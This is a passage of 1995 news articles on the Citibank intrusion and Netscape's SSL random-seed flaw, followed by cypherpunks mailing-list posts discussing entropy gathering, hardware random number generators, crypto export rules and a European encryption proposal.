keeping one step ahead of the hackers all the time is just not
possible. One with knowledge of the Citibank case comments:
"At the end of the day it cannot be done. Essentially,
security is about being reactive, not pro-dctive."

Meanwhile, the Citibank episode provides the most public
example yet of how hackers can threaten the integrity of the
international banking system. And just as the Barings collapse
prompted other banks to review their internal management
controls, so Mr Levin's case is having a similar effect on
computer security.

But as one bank security expert says: "It takes an incident
like this to prompt people to review their systems. Whether
they take action however is a different matter."

-----

Financial Times, September 20, 1995, p. 20.


Netscape flaw may deal blow to Internet security

By Louise Kehoe in San Francisco


A security flaw in Netscape Communications' popular Internet
software could deal a serious blow to companies planning to
transact business on the Internet, the global computer
network.

The flaw, discovered by two computer science students at the
University of California at Berkeley, means that financially
sensitive data, such as credit card numbers, sent over the
Internet using Netscape software could be vulnerable to
computer hackers.

"Security is the number one issue" that needs to be resolved
if the Internet is to become a medium for largescale
electronic commerce, according to Ms Cathy Medich, executive
director of CommerceNet, a consortium of companies that is
developing standards and protocols for conducting business on
the Internet with backing from the US government.

The security breach is a setback for Netscape, raising
concerns about the company's ability to produce reliable
secure software.

Netscape's so-called secure browsers are used by an estimated
66 per cent of people accessing the World Wide Web, the
segment of the Internet where thousands of companies have set
up electronic displays of their products.

The software had been seen as a breakthrough for electronic
commerce, enabling people to buy and sell goods online without
fear of their messages being intercepted.

Netscape confirmed that a security loophole has been
identified, but said it would offer a free security "patch" by
the end of this week on its World Wide Web page
(http://home.netscape.com).

No losses have been reported as a result of the security
breach, Netscape said.

This is the second time that Netscape's encryption has been
"cracked". Last month, a computer expert in France was able to
decode the weaker version of Netscape's cyphers, which the
company is allowed to export.

The security flaw found by the Berkeley students affects all
current versions of Netscape soMware, including its browsers
and server software, the company said.

However, next week the company will begin trials of a new
version of its browser, which will contain the security patch.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 17:18:06 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <199509202353.QAA20322@guaymas.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509201034.AA10521@prakinf.tu-ilmenau.de> you write:
> Is it a good idea to use different (unrelated!) seeded PRNG's for the
> challenge data (which can be seen by sniffing) and the masterkey (which
> should never leave out of client's memory?

No.

If the master key PRNG is poorly seeded, this is still exploitable:
for instance, there is a lot of redundancy in most plaintext, and
this can be used to check each candidate key value.

Just use a cryptographically secure PRNG seeded with enough entropy.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 20 Sep 95 14:09:11 PDT
To: kelli@zeus.towson.edu
Subject: Re: My new perspective on ITAR (was Re: Munitions shirt (again))
In-Reply-To: <Pine.ULT.3.91.950920151359.6005A-100000@zeus.towson.edu>
Message-ID: <9509202056.AA14060@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 20 Sep 1995 15:26:08 -0400 (EDT)
>From: "K. M. Ellis" <kelli@zeus.towson.edu>

[re. wearing an RSA T-shirt in the presence of furreners]

The CRYPTO conference sounds like a better alleged violation of export --
unless you take your shirt off and give it to the furrener or lie down on
his scanner to scan your bar codes (or maybe let him take a picture of
the bar codes). :-)

It was the late 70's when an over-enthusiastic person from NSA complained
to the IEEE that it was about to hold a conference including foreign
nationals at which crypto would be discussed.  This is clearly in violation
of the ITAR (dissemination of controlled technical data).  The IEEE
generally thumbed its nose at the NSA person and shortly thereafter (1980)
the ICAR was founded and CRYPTO conferences were held.

CRYPTO includes multiple attendees from the crypto services of (former)
(?current?) unfriendly governments.  (is France friendly? :-) It also has
multiple NSA attendees -- so it's not going on in secret from the gov't.

>I might add, however, that two days ago I wore my RSA shirt to my sound
>design class, where the guy I happened to sit down next to recognized it,
>was familiar with what it stood for, and knew all about the Zimmerman
>case; not because he was a crypto enthusiast or a comp sci major, but
>because he works for customs at Baltimore-Washington International
>Airport. 
>
>This event really changed my point of view considering ITAR... I figured 
>that it was just one of those dumb laws that _nobody_ really paid much 
>attention to except for the FBI and that was only because they were 
>looking for a way to nail Zimmerman for writing good crypto.  I had 
>assumed that ITAR was something that  customs agents/L. E. O's/etc. 
>learned about, took a  test on it, then forgot about it the next day.
>
>Interesting... they _really_ are serious, aren't they?

Well ...

I was at an AFCEA talk about export rules about 1.5 years ago and met a
special agent from Customs.  I asked him for Customs' policy on export of
crypto S/W and technical data by USENET News, FTP and WWW.  He seemed very
interested -- wanted my phone number -- was going to come out to visit to
see these sites offering this stuff.

He never came out.

I started e-mailing him asking him whether he was going to come get a tour
of the net -- and he stopped replying.

I can only assume that when he thought it was a single incident (like PRZ)
which could be tracked, he might follow it -- but when I started talking
about dozens or hundreds of people involved (e.g., all US persons talking
crypto techniques on sci.crypt) he lost interest.  I was going to show him
the MIT and TIS sites which release crypto code.  (Those sites have letters
from the State Dept. saying that what we do to restrict export is OK --
even if it is the honor system.)  I was going to show him how easy it is to
get crypto from overseas.

As I said, he lost interest.

 - Carl


+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 14:02:02 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202101.RAA05534@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton writes:
> I want to address the bug Netscape has with its currently released
> product with respect to seed generation. For the most part this is not
> a crypto issue, but rather a system issue.  Those bits of entropy can
> only be gathered in a system dependent manner.

Quite true.

> Assumption:
>     The basic idea is to feed a sequence of information into the MD5
>     hash, expecting that some of the bits for each sub-sequence would
>     be only be guessable. If we get enough unguessable bits into the mix,
>     then the weak link in the chain would not be the seed generation.

This is true. However, you must get 128 bits of entropy into the MD5
-- this can be accompanied by as much junk as you like, but if there
are at least 128 bits of entropy fed in, the MD5 process will distil
it into what you want.

You might want to read RFC 1750, and examine the code PGP uses for
doing its random generation. Clients do lots of fairly random things
while talking to netscape (click and keyboard press times, etc) that
can be incorporated in, along with other sources of bits. You should
grab bits whereever you can and keep them for when you need them, as
getting 128 bits takes a while.

> 	On Macs and Win* systems
> 	there are "tick" counters that update 60 (or maybe only 16)
> 	times a second.

PC timers inherently run at Mhz speed -- they interrupt every 100th of
a second but you can get finer resolution by querying the clock
chip. Does Windows let you do this?

By the way, starting with the time that the program was started is
okay but not great -- I think you probably can only safely assume a
few bits from this.

>     For UNIX we feed the following into the MD5 hash:
> 
> 	ps (-el or aux depending upon system)

I wouldn't do that, since it forces you to have a dependancy on
executing a subprocess. 

Were I you, I'd capture the timer on every single keystroke and mouse
click event and feed that in to your entropy generator a la PGP.

> 	System specific info such as hardware serial number or
> 	system id.

By definition, that isn't random. Don't use it.

There are other things you can mix in, besides keystroke and mouse
timings and positions, like system call timings for things that might
take a bit of time.

I can't speak to things on PCs, but...

> 	UUIDCreate if there is an ethernet card

No, sorry, this is very non-random.

>     For MACs:
> 	Machine location (longitude and latitude)

Non-random.

> 	User name

Non-random.

> 	audio volume

Doesn't change very often.

> Known weaknesses:
> 
>     If your X display is not the local machine then the X protocol can
>     be watched. Given that, the data for the reseeding of the MD5 hash
>     will be compromised. [Any scheme that relies on random user input
>     to generate a seed suffers from the same problem.]

Thats true, but its better than it could be, and most users will be
running local.

>     In fact, the entire X protocol issue is one that could take up
>     another 3 pages. An SSLized version of the server would help,
>     but how would anybody export it? You "xhost +" fans are doomed.

You guys should quit thinking of SSL as a good idea. It might be that
the concept is useful for backward compatibility, but don't think of
it as the universal solution just because you developed it.

>     Multi-user Unix machines present a special problem. There are those
>     at Netscape that argue that anybody who has login access to your
>     machine may as well be considered to have root access. There are
>     enough known attacks that this is true to a large extent.  However,
>     I think we can do better than just giving up.

I agree. Don't run on the assumption that everyone has root --
otherwise you'll build something that produces less safety than it could.

> What I would like:
> 
>     Any OS has access to a number of real-world physical sources of
>     randomness. This information is not made available to a user level
>     process. How long did that last seek take? Was there any noise on
>     the microphone? It would be good if the OS could gather that
>     information and make some set of bits available to any process that
>     asks. Having this be part of all OSes would make my job easier.
> 
>     More specifically: A "getnoise()" system call in UNIX could be
>     better than anything I can do and easier. Can we convince the UNIX
>     vendors to start providing that?

Actually, Ted Tso built a /dev/rand for Linux, and there are people
trying to port it to other platforms. This is probably a better idea
than a system call.

> For those that curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.

I've lost my share of nights to security holes announced late in the
day that HAD to be fixed for clients within hours. Welcome to the real
world. You play with the big boys and you get big headaches every once
in a while.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Thu, 21 Sep 95 11:55:19 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA and Netscape Crack
In-Reply-To: <ac84fbf926021004d2c2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950920173850.8197B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:
> 
> By the way, if we count our own Matt Blaze's work on exposing weaknesses of
> the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks
> achievement," then the Cypherpunks have actually played a dominant role in
> cracking these recent standards. (Not to mention the RC4 code postings, the
> various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations,
> etc.)
> 
> Well done, of course!
>

Absolutely.  And why not enter the PR fray by publicizing those 
successes?  Press release/identify persons for followups/etc.  (All with 
permission/participation of those who did it).  

Certainly, Cypherpunks has gotten press lately, and what I've seen has 
been good press.  Capitalize on it.

Finally, I've got to say that, as someone new to the concepts discussed 
here, I found it extremely cool to read about the latest break here and 
then see it in the news a day or two later.

EBD


 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Wed, 20 Sep 95 14:41:15 PDT
To: cypherpunks@toad.com
Subject: French Navy Security Compromised (Current by Shallow)
Message-ID: <9509202144.AA05842@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Heard that a very large break from computer 'hackers' has taken place in
France's navy.  Information regarding ship-identification was stolen.

-------------------------
Regards,                   
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 17:49:02 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: netscape's response
In-Reply-To: <199509210016.RAA20367@guaymas.CS.Berkeley.EDU>
Message-ID: <9509201745.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  5:16pm, David_A Wagner wrote:
> Subject: Re: netscape's response
> In article <9509200139.ZM206@tofuhut> you write:
> > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > One wild idea that I just got was to have servers and clients exchange
> > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > most viewers connect to a number of servers, and all servers are
> > > connected to by many clients, they would mix "randomness sources" with
> > > each other, making it impossible to observe the local environment
> > > only. And the random values would of course be encrypted under the
> > > session key, making it impossible to "watch the wire".
> > 
> >   Wow, this is a great idea!!
> 
> Are you quite sure this is a good idea?
> 
> I'd be very scared of it.  In particular, it opens up the chance for
> adversaries to feed you specially chosen numbers to pollute your seeds.

  What I should have said is that its a very interesting idea.  Given
current perceptions of netscape, I should have made clear that I
wouldn't do something like this without getting a lot more discussion
and review of possible dangers and how to avoid them.  I certainly
can't fault anyone for wondering if we would just implement this
without thinking it through, given recent events.

	--Jeff




-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 14:56:33 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <43q2l8$l10@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509200248.ZM206@tofuhut>, Jeff Weinstein <jsw@netscape.com> wrote:
>On Sep 20,  1:12am, sameer wrote:
>> 	Is UNIX really the most vulnerable? How many bits did the
>> tickcount account for? Seems to me that guessing just time & tick
>> would be easier than guessing time, pid and ppid if you are not logged
>> into the machine in question. . .
>
>  This is really dependent on how long window has been running.  If you
>boot windows and immediately start an ssl connection, then the number
>will be pretty low, but if you don't make the first SSL connection until
>later, it should get better.  I think an hour would get you around 16-bits,
>but this is just a guestimate on my part.  If you leave your machine
>running windows for days you will get close to 32bits.
>
But you don't have the usec at all, if I read your post correctly.

Windoze uses the time in seconds (essentially 0 bits of randomness,
maybe a couple, since Windoze machines don't set their clocks very well),
and the tick count.

In one hour, the tick counts counts to 3600*1000, or about 22 bits.
Many hours given another bit or two.

Thus, in total, given *no* information except the assumption that the
clock is reasonably accurate, you get at *most* 25 bits.

Since our code can do 21 bits in 1 minute, we'll need 16 minutes.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Wed, 20 Sep 95 20:47:15 PDT
To: cypherpunks@toad.com
Subject: Euro-Clipper
Message-ID: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I don't think I've seen this here (but it was on a bunch of security
newsgoups...)

   - Ian

Forwarded message:
> 
> According to an article in `Communications Week International', the
> 34-nation Council of Europe has agreed to outlaw strong encryption
> products which do not make keys available to governments.
> 
> The article, `Euro-Clipper chip scheme proposed', is on the front page
> of the magazine's issue 151, dated 18th September, which arrived in my
> mail this morning.
> 
> It relates that the policy was approved on the 8th September at
> Strasbourg by the Council, and coincides with an attempt by the
> European Commission to propose a pan-European encryption standard. The
> Council - unlike the Commission - has no statutory powers to enforce
> its recommendations. However, Peter Csonka, the chairman of the
> committee that drafted the document (and an administrative officer at
> the Council's division of crime problems) says that `it is rare for
> countries to reject Council of Europe recommendations'.
> 
> The proposal would make telecomms operators responsible for decrypting
> traffic and supplying it to governments when asked.  It would also
> `change national laws to enable judicial authorities to chase hackers
> across borders'.
> 
> Opposition to this measure was expressed by Mike Strezbek, VP
> responsible for European telecomms at JP Morgan, who said that his
> organisation `will challenge any attempt to limit the power of our
> network encryption technologies very strongly'.
> 
> Czonka said that the Council had given consideration to business
> interests but had tries to strike a balance between privacy and
> justice. However, `it remains possible that cryptography is available
> to the public which cannot be deciphered,' his document says. `This
> might lead to the conclusion to put restrictions on the possession,
> distribution, or use of cryptography.'
> 
> Apparently another international organisation, the OECD, has called a
> conference of its members in December to devise a strategy on
> encryption.
> 
> I for one will be making clear to my MP that his stand on this issue
> will determine how I cast my ballot at the next election. I note that
> John Major stated in a 1994 parliamentary written reply to David Shaw
> MP that the government did not intend to legislate on data encryption.
> I am disppointed that government policy has changed to the point of
> supporting the Council of Europe, and that this change has sneaked 
> through during the parliamentary recess.
> 
> Ross Anderson
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 16:10:23 PDT
To: cypherpunks@toad.com
Subject: software
In-Reply-To: <013.01607783.LFWS37A@prodigy.com>
Message-ID: <9509202310.AA12270@alpha>
MIME-Version: 1.0
Content-Type: text/plain



MR STEVE R. KELL writes:
 > I need new crypt software w/instruction if possible.

My favorite cypherpunks mail so far.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 15:19:12 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <199509201004.DAA23933@ammodump.mcom.com>
Message-ID: <43q40a$q8a@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201004.DAA23933@ammodump.mcom.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>
>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in the our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.

Well, if you'd release Netscape source, we could check its
implementation... :-)

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 15:27:51 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <199509202227.SAA05667@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



On this same track, I suggest that "/dev/random" devices for unix are
an excellent idea. Ted Tso did one for Linux that steals all the bits
of semi-random timing information it can. Such a driver has the
feature that it can be plugged into either a software pseudodriver or
a hardware device if one is available.

John Gilmore writes:
> Do we know any solid state physics / circuit design experts who think
> this might be a fun thing to do?  I bet you could get a paper out of
> it.  And probably improve the world a few years later, when companies
> used your paper to close another hole in their computer security.

There are companies that sell hardware RNGs -- Newbridge, for instance
-- but they charge an arm and a leg for them.

There is also a company that I got literature from that sells RS232
interfaceable radiation detectors, which I have thought about using
for this purpose, but they are also way too expensive.

As you say, what one really needs is something that fits in a small
section of a chip. Unfortunately, this stuff is very delicate analog
-- not the usual thing you find in standard cell -- and very easy to
screw up.

> PS: It's possible that NSA collusion with chip-makers could produce
> bad pseudo-random-number generators in popular chips, giving NSA a
> back-door into any algorithm that used them.  This would be harder to
> detect than poor software random number generators, since it requires
> prying the lid off the chip, getting out your microscope, and
> reverse-engineering the circuit, instead of just disassembling the
> software.  In this sense, NSA ought to be *encouraging* Intel and
> IBM and Motorola to put "generate random bits" instructions into
> their instruction sets...

An interesting concept!

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 20:46:40 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <9509201835.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


NOTE: my first attempt to send this bounced at toad.com

On Sep 20,  5:16pm, David_A Wagner wrote:
> Subject: Re: netscape's response
> In article <9509200139.ZM206@tofuhut> you write:
> > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > One wild idea that I just got was to have servers and clients exchange
> > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > most viewers connect to a number of servers, and all servers are
> > > connected to by many clients, they would mix "randomness sources" with
> > > each other, making it impossible to observe the local environment
> > > only. And the random values would of course be encrypted under the
> > > session key, making it impossible to "watch the wire".
> > 
> >   Wow, this is a great idea!!
> 
> Are you quite sure this is a good idea?
> 
> I'd be very scared of it.  In particular, it opens up the chance for
> adversaries to feed you specially chosen numbers to pollute your seeds.

  What I should have said is that its a very interesting idea.  Given
current perceptions of netscape, I should have made clear that I
wouldn't do something like this without getting a lot more discussion
and review of possible dangers and how to avoid them.  I certainly
can't fault anyone for wondering if we would just implement this
without thinking it through, given recent events.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 15:41:55 PDT
To: Phil Karlton <karlton@netscape.com>
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <199509202240.SAA05690@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton writes:
> Perry E. Metzger wrote:
> > This is true. However, you must get 128 bits of entropy into the MD5
> > -- this can be accompanied by as much junk as you like, but if there
> > are at least 128 bits of entropy fed in, the MD5 process will distil
> > it into what you want.
> 
> My assumption ws that if we conservatively counted at least 300 bits
> of entropy, we would have 128 for sure. Not very scientific,

Its not a bad way to go. You have to make sure that you have at least
that many bits of ENTROPY, however. Stuff like keystroke timings
should only be thought of as handing you a bit or so per click.

> > You might want to read RFC 1750,
> 
> Did that. It talks about a lot of the pitfalls. Unfortunately it
> does not address (nor can it realistically be expected to address)
> details of what to look for on a particular version of an OS running
> on some particular platform.

That is true. 

> > PC timers inherently run at Mhz speed -- they interrupt every 100th of
> > a second but you can get finer resolution by querying the clock
> > chip. Does Windows let you do this?
> 
> I don't know, but I'll forward this on to our PC guys. It might be a
> portability problem.

It actually shouldn't be -- every PC has the same timer chip or a
compatible one. The real question is whether Windows lets you get the
data out.

> > I wouldn't do that, since it forces you to have a dependancy on
> > executing a subprocess.
> 
> We try to be careful about dealing with the subprocess failing to run.

Also be especially careful about how you run the thing! Don't use
popen or anything like it!

> > >       System specific info such as hardware serial number or
> > >       system id.
> 
> > By definition, that isn't random. Don't use it.
> 
> It doesn't hurt. It's also information that is not available to the external
> evesdropper. Other than execution time, why should I remove it from the list
> of bits being fed into the hash?

You have to build to the model of someone who knows everything there
is to know about the machine. Why? Well, many pieces of information
can in fact be extracted -- license servers and SNMP agents are a way
to extract things like system IDs. (Overly chatty SNMP extensions and
similar stuff make me nervious about using too much ps based entropy,
by the by.)

If you put PROM ID into the hash, don't count it as a source of bits
-- just think of it as something extra to throw in to make life harder
-- and heavily comment that it is not to be counted in the magic 300
bits you are trying to extract. Remember, plan for the worst, not the
best, and you will never have trouble if the threat model gets worse.

As a security consultant, I always emphasize to clients that you have
to plan for worst case -- always. That way you can sleep at
night. Always assume the adversary has a way to break the individual
components of your system.

When I build firewalls, I rig them so that both an outer filtering
router, a tightened down application gateway, and an inner filtering
router must all fail in order for people to break in. I build things
on the assumption of maximum hostility on all points. Because of this,
every time a security hole has been announced for the last couple of
years -- in CISCO firmware, in Sendmail, in anything -- I've been able
to sleep because I've known that only one of many layers of protection
has been breeched and I have a few hours to fix the one layer that is
broken.

When building things like this, BUILD PARANOID. It never hurts.

> > >     Multi-user Unix machines present a special problem. There are those
> > >     at Netscape that argue that anybody who has login access to your
> > >     machine may as well be considered to have root access. There are
> > >     enough known attacks that this is true to a large extent.  However,
> > >     I think we can do better than just giving up.
> > 
> > I agree. Don't run on the assumption that everyone has root --
> > otherwise you'll build something that produces less safety than it could.
> 
> I agree, but I have a hard arguing with those that asser that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.

Always build belt-and-suspenders around any security system. Try to
make sure that there are as many ways as possible that things have to
fail before you get nuked. Throwing an impediment in the way of
non-root users is a good idea. You program it once and it protects
forever -- an excellent investment.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 20:45:57 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: netscape's response
In-Reply-To: <199509202215.PAA14101@ix.ix.netcom.com>
Message-ID: <199509210153.SAA25449@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Christian (that's me) writes:
| I think it is important to bring together factors of the user _and_
| the environment, preferrable an environment that reaches as far from
| the local site as possible. This makes "jamming" of the random seed
| selection process harder. 
| 
| The other problem in gathering random bits for a seed is that most
| bits are visible by someone else close enough within your environment.
| Interarrival times of packets are fine, but anyone can observe them
| with quite a good accuracy. How do you escape the "local environment
| problem"? 
| 
|                               . - .
| 
| One wild idea that I just got was to have servers and clients exchange
| random numbers (not seeds of course), in a kind of chaining way. Since
| most viewers connect to a number of servers, and all servers are
| connected to by many clients, they would mix "randomness sources" with
| each other, making it impossible to observe the local environment
| only. And the random values would of course be encrypted under the
| session key, making it impossible to "watch the wire".
| 
| Problems:
| * watch out for "multiply by zero" attacks by a rogue server/client.
| * watch out for "almost singular values" in the same way.
| * only let one source contribute a certain amount of randomness, like
|   (key length)/(aver # of peers).
| * never reveal your current seed, only a non-trivially derived random 
|   value from it. (of course)
| * make sure your initial seed is good enough, or the whole thing is
|   broken.
| * perhaps save part of the previous session state into a protected
|   file, to be able to keep up the quality of the initial seed.
| 
| I think I like it, perhaps not from a practical point of view as much
| as the 'non-attackability' of it. Its quite cypher-a. 

Bill Stewart answered:
| 
| Be _very_ careful with this approach - it's the kind of thing that a
| rogue server or client might abuse to find out randomness or other state
| information about the clients or servers connecting to it.

Of course you have to be very careful, as you say. Did you see my
problem-section in the original letter? I included it above. Since
then I have realized that the 

   | * only let one source contribute a certain amount of randomness, like
   |   (key length)/(aver # of peers).

really should be

   | * only let one source contribute a certain amount of randomness, like
   |   (large entropy buffer)/(aver # of peers).

and that you should only give out approximately the same amount of 
randomness to the neighbour, as you point out below.

| At minimum, only give out some of your randomness, XORed with some
| arbitrary value to scramble the range and then hashed before sending,
| so that the recipient can't find out the values you're using.

My approach solves part of the problem of "the observable local
environment" problem. 

Jeff's reply to this suggestion might be somewhat dangerous, if
the exchanged 'randomness bits' are the challenge/responses in the
exchange. (Based on his remark of not needing to change protocol.)
You would arguably not want to have the loop

         RNG --> "unguessable chall/resp" ---+
          /\                                 |
           +---------------------------------+

I would say that the only acceptable solution would be to have


(viewer)consumer <-------------------->consumer (srv)
          /\                             /\
           |                              |
   --->  RNG1 <---------------------->  RNG2 <----- RNGn
          /\                             /\
           |                              |
         RNGx                           RNGy

separating the "building up" of randomness from the 
consuming phase of that built up randomness, the actual
part which has to be totally unpredicate.

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 20 Sep 95 16:04:59 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: SCIENCE magazine on computers
Message-ID: <Pine.SOL.3.91.950920185926.22817A@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Sept * issue of SCIENCE magazine has a special section on computers 
of particular C-punk interest are articles on the rise of symmetric 
multiprocessor solutions to supercomputer needs and a piece on the future 
of computing discussing quantum dots, quantum computing, holographic 
association, optical computers, and DNA computers.

SCIENCE vol. 269 pages 1354-1385

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 20:45:17 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <ac86115235021004fbe4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known.  But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.

Essentially, to have good market penetration, this means building a small
hardware random number generator into the Pentium, and a few other popular
processors. Building it into a separate chip is ineffective, as chip counts
are going down on motherboards. (Some may quibble, but clearly about 60-80%
of the market is now x86-based, with motherboards supplied by a limited
number of companies, and with "chipsets" like the Triton.)

What would it take to convince Intel, then, to devote resources to put a
HRNG module on, say, future versions of the Pentium, Pentium Pro (P6),
etc.? A lot, I'd say.

First, Intel will ask what products would gain from _some_ hardware
platforms having HRNG when the majority will not. (This is important,
because it means that as long as there are vast numbers of 486-, Pentium-,
SPARC-, MIPS-, 68K-, and PPC-based systems out there that DON'T have
hardware random number generators, then Netscape and other suppliers of
software CANNOT COUNT ON THE HRNG.

This is an important point: a hardware RNG standard will take many years to
percolate into the installed base and reach a level of penetration where
even 30% of all machines are equipped with HRNG modules. In the meantime,
Netscape and everyone else has to come up with solutions which fit the
existing and nearterm-available machines.

Second, how much extra will customers pay? Even if the area of the HRNG is
less than 1% of the total, design resources are consumed and potential
reliability and liablility issues arise. (Liability is problematic
precisely because the HRNG is nondeterministic, and some chips are likely
to be "more random" (which is "good") than others which are "less random"
